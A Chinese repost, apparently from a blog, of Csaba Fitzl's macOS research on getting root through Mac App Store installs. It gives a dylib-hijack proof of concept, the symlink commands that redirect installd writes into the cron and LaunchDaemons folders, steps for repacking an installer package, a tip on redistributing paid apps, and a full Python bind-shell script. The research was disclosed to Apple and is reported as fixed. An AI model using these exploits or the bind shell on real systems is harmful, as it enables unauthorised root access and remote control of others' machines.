linux普通用户获取root权限_看我如何利用Mac官方AppStore中的应用程序获取root权限...

5720680134dfb30285850d9f67903225.gif

0a89be9a8015dbafd6db74e83788fc86.png一、前言

在本篇文章中,“Objective by the Sea”的演讲者Csaba Fitzl撰写了一篇有趣的方法,通过官方Mac AppStore中的应用程序来获取root权限。

他的研究最开始是在“Objective by the Sea”v2.0中提出的,演讲时展示的PPT请参考这里。

3768ab596ef70fe04080404e35770035.png

0a89be9a8015dbafd6db74e83788fc86.png二、背景

这篇文章主要讲述了我的研究过程,我想展示一下我是如何在快速的研究过程中发现问题的,我最终在macOS中发现了一个本地权限提升漏洞。除了成功发现的漏洞之外,我还想讨论我在研究过程中遇到的所有障碍和失败,尽管人们通常不会谈论这一些,但我认为,当我们试图创造(或利用)某些东西时,这是所有人的一个必经之路。

0a89be9a8015dbafd6db74e83788fc86.png三、macOS上的Dylib劫持

3.1 基础概念

在整个研究过程中,我都试图在特定应用程序中找到dylib劫持漏洞,在这里我不能透露具体的应用程序名称。最终,我没有在那个特定的应用程序中发现漏洞,但在许多其他的应用程序中发现了这类漏洞。

如果各位读者还不熟悉macOS上的dylib劫持,可以阅读:

1. Patrick Wardle的文章:病毒的子弹 – OSX上的Dylib劫持

2. DEF CON 23演讲:OSX上的DLL劫持

我推荐大家优先观看演讲,因为这是一位非常出色的演讲者,并且会以非常友好的方式来解释这个主题,可以帮助大家掌握所有的细节。

我们简而言之,存在两种类型的dylib劫持:

1. dylib弱加载:在这种情况下,操作系统将使用LC_LOAD_WEAK_DYLIB函数,如果没有找到dylib,应用程序仍然会运行,并且不会报错。因此,如果有一个应用程序使用此方法引用dylib,并且dylib实际上不存在,那么我们可以利用这一点。

2. 运行路径依赖(rpath)dylib:在这种情况下,dylib会使用@rpath前缀引用,它将指向mach-o文件的当前运行位置,并尝试根据此搜索路径查找dylib。如果我们不知道安装后的应用程序会在哪里结束,那么这是一种非常好的方式。开发人员可以指定多个搜索路径,如果第一个或者第一对不存在,那么就可以将恶意dylib放在相应位置,因为加载器会按照顺序搜索这些路径。在逻辑上,这类似于Windows中的经典DLL劫持。

3.2 寻找易受攻击的应用

这一过程比较困难,需要我们下载Patrick的“Dylib Hijack Scanner”(DHS,Dylib劫持扫描器)工具,运行扫描并等待。除此之外,还有一个命令行版本的工具,也是由Patrick编写的。

在演示中,我将使用Tresorit应用程序作为示例,因为他们已经修复了漏洞,并且他们的反映非常及时,在报告漏洞后的几天内就修复了这一问题。我不会在这里提及所有的应用程序,但大家如果看到应用程序的清单,一定会为其数量之多而惊讶。

90382abc78862b3e0a33b65fbe6f24c5.png

从上图中可以看出,dylib劫持漏洞与Tresorit的FinderExtension有关:

/Applications/Tresorit.app

/Contents/MacOS/TresoritExtension.app

/Contents/PlugIns/FinderExtension.appex

/Contents/MacOS/FinderExtension

我们可以在这里放置(恶意的)dylib UtilsMac:

rpath漏洞:/Applications/Tresorit.app

/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex

/Contents/Frameworks/UtilsMac.framework/Versions/A/UtilsMac

DHS只会向我们展示第一个劫持的dylib,但实际上可能会有更多。要检查其他位置,可以在终端中将DYLD_PRINT_RPATHS变量设置为1,即可查看到加载程序尝试加载哪些dylib。如我们所见,有两个可能被劫持的dylib:

$ export DYLD_PRINT_RPATHS="1"

$ /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app

 /Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension

RPATH failed to expanding  @rpath/UtilsMac.framework/Versions/A/UtilsMac to:

/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app

 /Contents/PlugIns/FinderExtension.appex/Contents/MacOS

 /../Frameworks/UtilsMac.framework/Versions/A/UtilsMac

RPATH successful expansion of @rpath/UtilsMac.framework/Versions/A/UtilsMac to:

/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns

 /FinderExtension.appex/Contents/MacOS

 /../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac

RPATH failed to expanding @rpath/MMWormhole.framework/Versions/A/MMWormhole to:

/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns

 /FinderExtension.appex/Contents/MacOS/

 ../Frameworks/MMWormhole.framework/Versions/A/MMWormhole

RPATH successful expansion of @rpath/MMWormhole.framework/Versions/A/MMWormhole to:

/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns

 /FinderExtension.appex/Contents/MacOS

 /../../../../Frameworks/MMWormhole.framework/Versions/A/MMWormhole

Illegal instruction: 4

此外,最好仔细检查APP是否使用了库验证选项(flag = 0x200)进行编译。如果以这种方式编译应用程序,就意味着即使dylib可能被劫持,操作系统也只会加载由操作系统签名的库,或者与应用程序具有相同团队ID签名的库。换而言之,对应用程序的任何dylib劫持尝试都会以失败告终。

大多数应用程序都没有以这种方式编译,包括Tresorit在内(但他们承诺会修复这一问题):

$ codesign -dvvv /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns

 /FinderExtension.appex/Contents/MacOS/FinderExtension

Executable=FinderExtension.appex/Contents/MacOS/FinderExtension

Identifier=com.tresorit.mac.TresoritExtension.FinderExtension

Format=bundle with Mach-O thin (x86_64)

CodeDirectory v=20200 size=754 flags=0x0(none) hashes=15+5 location=embedded

...

3.3 漏洞利用

根据上面的讨论,实现漏洞利用就变得非常简单,在这里我们只做简要说明。我编写了以下的PoC:

#include

 #include

 #include

 __attribute__((constructor))

 void customConstructor(int argc, const char **argv)

  {

      printf("Hello World!\n");

      system("/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal");

     syslog(LOG_ERR, "Dylib hijack successful in %s\n", argv[0]);

}

在加载dylib时,将会调用构造函数。它将打印一行,创建一个syslog条目,并启动终端(Terminal)。如果该应用程序未在沙箱中运行,我们将会获得一个功能齐全的终端。对其进行编译:

gcc -dynamiclib hello.c -o hello-tresorit.dylib -Wl,-reexport_library,"/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac"

随后,运行Patrick的修复脚本。该脚本将会为我们修复dylib版本(dylib加载器会在加载时验证版本信息),并且将添加原始dylib的所有导出。这些导出实际上将指向有效(原始的)dylib,因此当应用程序加载我们精心制作的版本时,仍然可以使用所有函数,并且不会发生崩溃。

python2 createHijacker.py hello-tresorit.dylib "/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac"

CREATE A HIJACKER (p. wardle)

configures an attacker supplied .dylib to be compatible with a target hijackable .dylib

 [+] configuring hello-tresorit.dylib to hijack UtilsMac

 [+] parsing 'UtilsMac' to extract version info

     found 'LC_ID_DYLIB' load command at offset(s): [2568]

     extracted current version: 0x10000

     extracted compatibility version: 0x10000

 [+] parsing 'hello-tresorit.dylib' to find version info

     found 'LC_ID_DYLIB' load command at offset(s): [888]

 [+] updating version info in hello-tresorit.dylib to match UtilsMac

     setting version info at offset 888

 [+] parsing 'hello-tresorit.dylib' to extract faux re-export info

     found 'LC_REEXPORT_DYLIB' load command at offset(s): [1144]

     extracted LC command size: 0x48

     extracted path offset: 0x18

     computed path size: 0x30

     extracted faux path: @rpath/UtilsMac.framework/Versions/A/UtilsMac

 [+] updating embedded re-export via exec'ing: /usr/bin/install_name_tool -change

 [+] copying configured .dylib to /Users/csaby/Downloads/DylibHijack/UtilsMac

完成后,我们只需复制文件,并启动应用程序即可。现在,我们的恶意dylib将会自动加载到Tresorit Finder扩展应用程序中。

3.4 其他APP

考虑到易受攻击应用程序的数量之多,我甚至没有花费时间来报告所有这些问题,只报告了少数几个。除了Tresorit之外,我报告了Avira的一个漏洞,他们承诺修复,但是定的优先级较低,因为我们必须先获得使用该应用程序的root权限。另外,我还报告了Microsoft Office 2016中的一个漏洞,微软认为这不属于安全漏洞,因为需要使用root权限来利用,他们建议我可以提交产品Bug。但我不认同这样的观点,因为这是一种持久性的方式,但就目前情况而言,我似乎没办法去和他们争辩。

3.5 特权问题

我原本的研究已经完成,但这也是超越我原本研究结果的开始。

在许多应用程序中都存在此类问题,理论上我们只需要将dylib放到正确的位置,但在利用此漏洞所需的权限上,可能存在两种主要的方案。

1. 应用程序文件夹由我们的账户拥有(实际上,每个用户都是Mac上的管理员,因此我们在这里不考虑标准用户的情况),在这种情况下,我们可以轻松地投放文件。

2. 应用程序文件夹由root拥有,因此我们需要root权限才能执行攻击。实际上,这样的场景并不太好,既然我们能够获得root权限,那么显然可以在其他地方创建持久性,并且应用程序通常会在沙箱中运行,因此我们不能从这里获得太多。这确实是一个问题。

通常,拖放到/Application目录的应用程序都属于第一类,AppStore中的所有应用程序都属于第二类,因为后者将由以root身份运行的installd守护程序安装。从软件包安装的应用程序通常也属于第二类,通常需要提升权限。

我对厂商的回复不太满意,并且也不喜欢开发出仅有root权限才能利用的漏洞,因此我开始思考,我们是否可以绕过根文件夹的权限?答案是肯定的,否则这篇文章就到此结束了。

0a89be9a8015dbafd6db74e83788fc86.png四、监控工具

在继续之前,我首先介绍一些对事件监控有所帮助的工具。

4.1 FireEye – Monitor.app

这是一个FireEye编写的应用程序,类似于procmon,可以从这里下载。

b9de96292ac41ff8c8074d65317c05c1.png

4.2 Objective-See的ProcInfo库和ProcInfoExample

这是一个用于监控macOS上进程创建和进程结束的开源库。我使用了这个库的演示项目,名为“ProcInfoExample”。它是一个命令行实用程序,将会记录每个进程创建,包括所有相关的详细信息,例如参数、签名信息等。

它将会为我们提供比Monitor应用程序更多的信息:

2019-03-11 21:18:05.770 procInfoExample[32903:4117446] process start:

pid: 32906

path: /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/efw_cache_update

user: 0

args: (

    "/System/Library/PrivateFrameworks/PackageKit.framework/Resources/efw_cache_update",

    "/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/BC005493-3176-43E4-A1F0-82D38C6431A3.activeSandbox/Root/Applications/Parcel.app"

)

ancestors: (

    9103,

    1

)

 signing info: {

    signatureAuthorities =     (

        "Software Signing",

        "Apple Code Signing Certification Authority",

        "Apple Root CA"

    );

    signatureIdentifier = "com.apple.efw_cache_update";

    signatureSigner = 1;

    signatureStatus = 0;

}

 binary:

name: efw_cache_update

path: /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/efw_cache_update

attributes: {

    NSFileCreationDate = "2018-11-30 07:31:32 +0000";

    NSFileExtensionHidden = 0;

    NSFileGroupOwnerAccountID = 0;

    NSFileGroupOwnerAccountName = wheel;

    NSFileHFSCreatorCode = 0;

    NSFileHFSTypeCode = 0;

    NSFileModificationDate = "2018-11-30 07:31:32 +0000";

    NSFileOwnerAccountID = 0;

    NSFileOwnerAccountName = root;

    NSFilePosixPermissions = 493;

    NSFileReferenceCount = 1;

    NSFileSize = 43040;

    NSFileSystemFileNumber = 4214431;

    NSFileSystemNumber = 16777220;

    NSFileType = NSFileTypeRegular;

}

signing info: (null)

4.3 内置的fs_usage实用程序

fs_usage实用程序可以非常详细地监视文件系统事件,甚至在我们看来有些过于详细了,如果我们想从中获取到有用的数据,就必须要做好过滤。我们将得到类似于以下内容:

# fs_usage -f filesystem

getxattr /Applications/Parcel.app lsd.4123091

access    (___F)  /Applications/Parcel.app/Contents  lsd.4123091

fstatat64 [-2]/   /Applications/Parcel.app  lsd.4123091

getattrlist       /Applications/Parcel.app  lsd.4123091

getattrlist       /Applications/Parcel.app/Contents  lsd.4123091

getattrlist       /Applications/Parcel.app/Contents/MacOS  lsd.4123091

getattrlist       /Applications/Parcel.app/Contents/MacOS/Parcel  lsd.4123091

getattrlist       /Applications/Parcel.app  lsd.4123091

0a89be9a8015dbafd6db74e83788fc86.png五、绕过App Store安装的应用程序中的根文件夹权限

我们的目标是在AppStore安装的应用程序中写入任何文件,默认情况下只能由root访问。

在这里的绕过,只适用于应用程序已经安装过至少一次的情况,因为当我们购买APP时,即使它是免费的,也需要向AppStore进行身份验证,或者用户预先为免费的应用程序设置了“保存密码”。我们注意到,可以在“/Applications”文件夹中创建文件夹,显然我们也可以在那里拖放应用程序。但是,如果我为即将要安装的应用程序创建一个文件夹会怎样?下面展现了这一过程,以及绕过根文件夹权限的步骤:

1. 在删除应用程序之前,需要记录下文件夹的结构,我们具有读取的权限。这一过程是为了以后清楚要重新创建的内容。

2. 启动Launchpad找到该应用程序,如果当前已经安装,则将其删除。值得注意的是,尽管我们作为普通用户与Launchpad进行交互,但还是会删除应用程序,它只能对从AppStore安装的应用程序执行此操作。

3. 在/Applications文件夹中,使用常规ID创建文件夹结构,我们可以在没有root访问权限的情况下执行此操作。这样一来,就可以创建我们需要的文件夹,并将我们的dylib(或任何想要的文件)放在文件夹中。

4. 返回AppStore,并在“已购买”选项卡中找到该应用程序并进行安装。在这种情况下,我们无须进行身份验证。我们还可以使用GitHub提供的命令行实用程序 GitHub – mas-cli/mas Mac AppStore命令行界面。

此时,应用程序将会被安装,并且我们可以使用应用程序,并在相应位置放置文件。理论上,如果没有root权限,这些文件本应是无法被放置的。

这一漏洞已经在Mojave 10.14.5中被修复,稍后我将详细讨论。

比较而言,这就像是对Windows上的“Program Files”文件夹具有写入权限。管理员用户确实可以,但也仅当他们以高完整性运行时,这意味着我们需要从默认的中等(MEDIUM)完整性模式中绕过UAC。但在Windows中,将中等(MEDIUM)完整性的Admin提升到高(HIGH)完整性并不需要越过安全边界,但在macOS中,将admin提升到root则跨越了边界。

0a89be9a8015dbafd6db74e83788fc86.png六、更进一步:在任意位置投放AppStore文件

6.1 具体方法

在这一点上,我有另外一个想法。由于installd以root身份运行,我们可以利用它将应用程序放在其他位置或者某个确定的位置吗?答案是肯定的。假设我想将APP的主要mach-o文件放在只有root访问权限的文件夹中,例如/opt(受SIP保护的文件夹,例如/System将不起作用,因为即使root用户也没有访问权限)。下面是重现的步骤,其中1-2步与之前相同。

3. 创建以下文件夹结构:/Applications/Example.app/Contents。

4. 创建符号链接“MacOS”,指向/opt: ln -s /opt /Applications/Example.app/Contents/MacOS。

主要的mach-O文件通常位于/Applications/Example.app/Contents/MacOS文件夹下,在我们的示例中,将其指向/opt。

5. 安装应用程序。

此时,应用程序会正常安装,但是/Applications/Example.app/Contents/MacOS下的任何文件都将被转到/opt。

如果存在具有mach-O文件名称的文件,那么该文件将会被覆盖。基本上,我们可以将AppStore应用程序中能够找到的任何文件投放到我们控制的位置。

6.2 我们不能做什么?

1. 我们不能更改要投放的文件的名称,或者换而言之,我们不能将一个文件的内容放入另一个具有不同名称的文件中。如果我们为实际的mach-o文件创建一个符号链接,例如:ln -s /opt/myname /Applications/Example.app/Contents/MacOS/Example,当installd守护进程移动时,会覆盖符号链接文件从临时位置到最终位置。如果我们尝试使用mv命令,可以发现相同的行为:

$ echo aaa > a

$ ln -s a b

$ ls -la

total 8

drwxr-xr-x   4 csaby  staff   128 Sep 11 16:16 .

drwxr-xr-x+ 50 csaby  staff  1600 Sep 11 16:16 ..

-rw-r--r--   1 csaby  staff     4 Sep 11 16:16 a

lrwxr-xr-x   1 csaby  staff     1 Sep 11 16:16 b -> a

$ cat b

aaa

$ echo bbb >> b

$ cat b

aaa

bbb

$ touch c

$ ls -l

total 8

-rw-r--r--  1 csaby  staff  8 Sep 11 16:16 a

lrwxr-xr-x  1 csaby  staff  1 Sep 11 16:16 b -> a

-rw-r--r--  1 csaby  staff  0 Sep 11 16:25 c

$ mv c b

$ ls -la

total 8

drwxr-xr-x   4 csaby  staff   128 Sep 11 16:25 .

drwxr-xr-x+ 50 csaby  staff  1600 Sep 11 16:16 ..

-rw-r--r--   1 csaby  staff     8 Sep 11 16:16 a

-rw-r--r--   1 csaby  staff     0 Sep 11 16:25 b

2. 即使我们创建了一个硬链接,而不是符号链接,也会像第一种情况一样被覆盖。

3. 如前所述,我们无法写入受到SIP保护的文件夹。

6.3 利用这一点进行权限提升的思路

基于以上内容,我对于如何从admin提升到root权限,有以下思路:

1. 在AppStore中查找与root身份运行的进程同名的文件,并替换该文件。

2. 在AppStore中找到一个文件,其中包含一个cron任务称为“root”,我们可以将其放入/usr/lib/cron/tabs。

3. 如果没有发现,我们可以创建一个完全无害的应用程序,该程序可以弹出一个交互式提示,或者类似的内容,随后我们将其上传到AppStore。举例来说,我们的文件可能包含示例root crontab文件,该文件每小时启动一次终端(Terminal)。我们可以将其放在crontab文件夹中。

4. 制作恶意dylib,将其作为应用程序的一部分上传到AppStore,并投放该文件,以便以root身份运行的应用程序会加载它。

6.4 向Apple报告

我承认,在这一过程中,我采用了比较懒惰的方法向Apple报告了上述情况,主要原因在于:

1. 我发现我不太可能找到满足#1或#2的合适文件。Xcode几乎满足#2,因为其中包含一些cron示例,但无法命名为root。

2. 我在开发AppStore应用程序方面几乎没有经验,并且不会Objective-C或Swift编程。

3. 在工作中和下班后,还有其他事项要处理。

因此,我简单地向Apple报告,随后收到了他们的反馈:“App Review流程有助于防止恶意应用程序在Mac和iOS应用程序商店中出现”。

显然,Apple没有理解这个问题,或者是我的表达出现了问题,但很明显我们之间存在了误解。因此,我认为我必须要证明这一观点。于是,我决定开发一个应用程序,并将其提交给AppStore,以此来证明。

0a89be9a8015dbafd6db74e83788fc86.png七、创建APP

经过一番思考后,我决定创建一个能够为root提供crontab文件的应用程序,然后将其放到/usr/lib/cron/tabs文件夹中。应用程序必须实现一些有意义的用途才能审核通过,因此我想到创建一个cronjob编辑器应用程序。这一应用程序具有实际价值,也可以解释为什么我会嵌入crontab文件。

7.1 Apple开发者ID

要向AppStore提交任何应用程序,我们必须首先注册开发者计划。我注册了一个新的ID,因为我担心制作出可用于权限提升的应用程序后官方会禁用掉我的ID,但事实上并没有。开发者ID每年需要花费99美元。

7.2 发布到AppStore的流程

1. 成为Apple的开发人员,每年支付99美元;

2. 登录App Store Connect,并创建一个Bundle ID;

8549348fa063cb930c145a45974223cc.png

3. 返回并创建一个新的App,引用我们创建的Bundle ID;

dadabff20e8132930f4574c7815bb9a5.png

4. 填写详细信息(许可证页面、描述等);

5. 从Xcode上传我们的应用程序;

6. 如果需要,填写更多详细信息;

7. 提交审核。

7.3 应用程序详情

我开发的应用程序名为“Crontab Creator”,该应用对于创建crontab文件非常有用。该应用程序目前仍然存在,并且持续可用,事实证明,确实有一些用户使用了它。

8a7ba72e6f7c13f0557aab23b1ebc44a.png

该应用程序绝对是合法的,但其中包含了crontab文件的不同示例,它们都作为单独的文件存储在应用程序中。我之所以没有将字符串嵌入到源代码之中,就是因为要将其用于漏洞利用。其中,有一个文件名为“root”,它将尝试从_Applications_Scripts文件夹执行脚本。

0a89be9a8015dbafd6db74e83788fc86.png八、在High Sierra上实现权限提升

8.1 权限提升步骤

Crontab Creator应用程序包含一个名为“root”的文件作为crontab文件的示例,以及另外9个文件。其内容如下:

* * * * * /Applications/Scripts/backup-apps.sh

显然,默认情况下该脚本并不存在,但我们可以在/Application文件夹中轻松创建这一脚本,因为我们具有写入权限,所以可以将任何内容放入其中。

权限提升的步骤如下。首先,我们需要创建app文件夹结构,并在其中放置符号链接。

cd /Applications/

mkdir "Crontab Creator.app"

cd Crontab\ Creator.app/

mkdir Contents

cd Contents/

ln -s /usr/lib/cron/tabs/ Resources

随后,我们需要创建脚本文件,它将每分钟运行一次,我选择让它运行终端(Terminal)。

cd /Applications/

mkdir Scripts

cd Scripts/

echo /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal > backup-apps.sh

chmod +x backup-apps.sh

然后,我们需要从商店安装应用程序。我们可以通过GUI执行此操作,或者如果已经安装brew和mas,也可以通过CLI执行此操作:

/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"brew install mas

mas install 1438725196

回顾之前分析的漏洞,我们可以将文件放入crontab文件夹,创建脚本,并在其中启动终端,随后便可以在一分钟之内获得弹出和root访问权限。

8.2 漏洞修复

如前所述,Apple已经在Mojave中修复了这一漏洞利用路径。在2018年10月,我发现我的PoC不能再正常使用。在没有进行进一步测试的情况下,我误以为权限提升漏洞已经被修复,但实际上,我们仍然可以投放文件到应用程序中。

0a89be9a8015dbafd6db74e83788fc86.png九、在不破坏应用程序签名的情况下感染安装程序

接下来,我们希望能够针对手动安装的应用程序绕过其根文件夹权限。我们无法在这里进行真正的绕过或权限提升,因为在安装过程中用户必须输入其密码,但我们仍然可以沿用此前的思路。在这里,我希望展示另外一种方法,那就是如何将我们的自定义文件嵌入到安装程序包中。如果我们可以对pkg的下载过程开展中间人攻击,那么就可以使用自己的安装包来替换合法文件,或者通过电子邮件或其他方式将其提供给用户。

需要说明的是,尽管AppStore中的应用程序都是通过HTTP下载的,但我们并不能实际篡改它,因为哈希值是通过HTTPS传递的,同时签名也会被验证。

下面是如何将自定义文件封装在有效包中的步骤:

1. 获取安装程序pkg:使用AppStoreExtract或DerFlounder从Mac的AppStore下载安装程序包

2. 解压缩pkg:pkgutil --expand example.pkg myfolder

3. 输入文件夹,然后解压缩嵌入的Payload(嵌入式pkg文件夹内):tar xvf embedded.pkg/Payload

4. 将我们的文件嵌入其中(可以在任意位置嵌入任意文件):bash $ mkdir Example.app/Contents/test $ echo aaaa > Example.app/Contents/test/a

5. 重新压缩应用程序:find ./Example.app | cpio -o --format odc | gzip -c > Payload

6. 删除不需要的文件,并将Payload移动到嵌入式pkg文件夹

7. 重新封装pkg:pkgutil --flatten myfolder/ mypackage.pkg

随后,安装包的数字签名将会丢失,因此我们需要一种绕过Gatekeeper的方法。嵌入式应用程序的签名也会被破坏,因为.app Bundle中的每个文件都必须进行数字签名。通常,主mach-o文件是有符号的,它具有_CodeSignatures plist文件的哈希值。该文件将包含其他文件的所有哈希值。如果在.app Bundle中放置一个新文件,该文件会使得哈希值无效。但是,这并不是问题,就好像我们可以绕过Gatekeeper获取.pkg文件一样,安装的应用程序不会受到Gatekeeper的约束。

0a89be9a8015dbafd6db74e83788fc86.png十、重新分发付费应用

我们使用与上一个示例中相同的工具,可以获取特定应用程序的安装程序。如果我们以这样的方式保留收费的应用程序,即使在用户未付费的情况下,它也可以在其他位置使用。在应用程序中,不会默认对该应用程序是否已经购买进行验证,其中也不包含跟踪购买情况的任何内容。因此,如果我们购买了一个应用程序,就可以轻松地将其分发到其他位置。应用程序内购可能不会起作用,因为它们与Apple ID相关联。

0a89be9a8015dbafd6db74e83788fc86.png十一、在Mojave上实现权限提升

11.1 漏洞修复

在今年,我一直与其他研究人员谈论这个漏洞的问题,并且这一漏洞对我产生了一定的打击。实际上,我并没有做任何进一步的检查来确认符号链接是否完全被破坏。事实证明,并非如此。

macOS修复这一漏洞的方法是,即使以root身份运行,installd也不再访问crontab文件夹(/usr/lib/cron/tabs),因此也无法在那里创建文件。我甚至不确定,他们是直接针对我的PoC做了修复,还是存在其他一些巧合。我们可以在/var/log/install.log中找到相关的错误信息:

shove[1057]: [source=file] failed

_RelinkFile(/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager

 /401FEDFC-1D7B-4E47-A6E9-E26B83F8988F.activeSandbox/Root/Applications

 /Crontab Creator.app/Contents/Resources/peter, /private/var/at/tabs/peter):

Operation not permitted

11.2 存在的问题

installd进程仍然可以访问其他文件夹,并且可以在重定向期间投放文件,而这些文件也可能会被滥用。经过测试,我发现可以将文件写入重定向到下述具有潜在风险的文件夹中:

/var/root/Library/Preferences/

攻击者可能会投放一个名为com.apple.loginwindow.plist的文件,该文件可以包含一个以root身份运行的LoginHook。

/Library/LaunchDaemons/

在此处投放plist文件将以root身份执行。

/Library/StartupItems/

在此处投放plist文件将以root身份执行。

此外,也可以写入到/etc中。

将文件投放到这些位置的思路,与将文件投放到crontab文件夹的想法基本相同。可能还会有许多文件夹受到影响,因此我们可以制作恶意dylib文件,但我在这里没有进一步探索。

11.3 第二个PoC

掌握了上述情况,我现在就是一个“经验丰富”的macOS开发人员了,我创建了一个名为StartUp的新PoC:

9828bd42e76b4f0b7e9c0a22613180e6.png

该文件的创建实际上是与之前一样的,但在我们的示例中是LaunchDaemons。

其实现方式是:

cd /Applications/

mkdir “StartUp.app”

cd StartUp.app/

mkdir Contents

cd Contents/

ln -s /Library/LaunchDaemons/ Resources

cd /Applications/

mkdir Scripts

cd Scripts/

在这里,我们可以创建一个在启动后以root身份运行的sample.sh脚本。实际中,我将一个Bind Shell放入该脚本中,在登录后,一旦连接到它,我就获得了一个root Shell,但这还是取决于我们放置到目标的内容。

#sample.sh

python /Applications/Scripts/bind.py

 #bind.py

 #!/usr/bin/python2

 """

 Python Bind TCP PTY Shell - testing version

 infodox - insecurety.net (2013)

 Binds a PTY to a TCP port on the host it is ran on.

 """

 import os

 import pty

import socket

lport = 31337 # XXX: CHANGEME

def main():

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.bind(('', lport))

    s.listen(1)

    (rem, addr) = s.accept()

    os.dup2(rem.fileno(),0)

    os.dup2(rem.fileno(),1)

    os.dup2(rem.fileno(),2)

    os.putenv("HISTFILE",'/dev/null')

    pty.spawn("/bin/bash")

    s.close()

if __name__ == "__main__":

main()

11.4 向Apple再次反馈

我在2019年2月再次向Apple报告了这一问题,并试图详细解释为什么我认为安装过程仍然存在漏洞,并且可能被滥用。

11.5 增强安全性

Apple从未承认这是一个安全漏洞,也从未为其分配过CVE编号,他们认为这是一个增强的功能。最终,在Mojave 10.14.5上实现了修复,他们甚至在页面上提到了我的名字:

0441799be88f25df981fe7cfe4947b1a.png

我做了一个快速的测试,最终发现他们终于成功修复了这一问题。如果我们创建应用程序的文件夹,并在其中放置文件,最终将会全部被删除。我们使用FireEye的Monitor.app可以证明这一点。第一个事件说明了整个文件夹都被移动:

64de35837f345a3c4cbf12f59bce1bc1.png

如果把这一过程用《权利的游戏》的画面展现出来,应该是这样的:

924212512e379f16c2e5718a9040d07f.png

下面的事件说明,已经将应用程序安装到恰当的位置:

51f9c6ca7febf3aaee159a8dd25e34d3.png

因此,我们就不能再投放文件了。

我非常喜欢最终修复的方式,因此要在这里感谢Apple。此外,我要感谢Patrick Wardle,每次当我询问他关于macOS的愚蠢问题时,他总是积极帮助我。

由于我已经绕过了Apple的修复方法,因此故事仍然在继续。一旦他们彻底修复了漏洞,我会及时进行更新。

23b9e6105e0d4868f740ab6194801f67.png

e23a86e795ff54c84874695d80752864.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值